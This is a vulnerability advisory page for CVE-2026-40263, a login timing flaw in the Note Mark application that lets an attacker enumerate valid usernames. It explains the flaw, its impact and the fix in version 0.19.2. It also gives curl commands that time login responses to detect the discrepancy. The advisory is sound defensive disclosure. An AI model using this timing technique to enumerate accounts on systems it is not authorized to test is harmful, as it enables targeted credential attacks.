CVE-2026-40263
Username Enumeration via Timing Attack in Note Mark Login
Publication date: 2026-04-17
Last updated on: 2026-04-17
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| note_mark | note_mark | to 0.19.2 (exc) |
| note_mark | note_mark | 0.19.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-208 | Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Note Mark, an open-source note-taking application, in versions 0.19.1 and earlier. The login endpoint only performs bcrypt password verification if the username exists. If the username does not exist, the system returns immediately without performing the verification. This difference in response time allows an attacker who is not authenticated to determine which usernames are valid by measuring how long the system takes to respond.
By exploiting this timing discrepancy, attackers can enumerate valid usernames, which can then be used to launch targeted credential attacks.
How can this vulnerability impact me? :
The vulnerability allows attackers to discover valid usernames on the Note Mark application by measuring response times during login attempts.
Once attackers know valid usernames, they can focus their efforts on those accounts, increasing the risk of successful credential-based attacks such as password guessing or brute force attacks.
Although the CVSS score is relatively low (3.7), the information disclosure can facilitate further attacks that may compromise user accounts.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade Note Mark to version 0.19.2 or later, where the timing discrepancy in the login endpoint has been fixed.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows unauthenticated attackers to enumerate valid usernames by measuring response times during login attempts. This could potentially facilitate targeted credential attacks.
However, there is no specific information provided about how this vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by measuring the response times of the login endpoint when submitting login attempts with different usernames. Specifically, an attacker can send login requests with both existing and non-existing usernames and observe the timing differences in the server's responses.
To detect this on your system, you can use command-line tools like curl combined with time measurement utilities to compare response times for valid and invalid usernames.
- Use curl to send login requests and measure response time, for example: time curl -X POST -d 'username=validuser&password=any' https://your-note-mark-instance/login
- Repeat the above command with a non-existent username and compare the response times.
- If the response time for valid usernames is consistently longer than for invalid ones, this indicates the presence of the timing discrepancy vulnerability.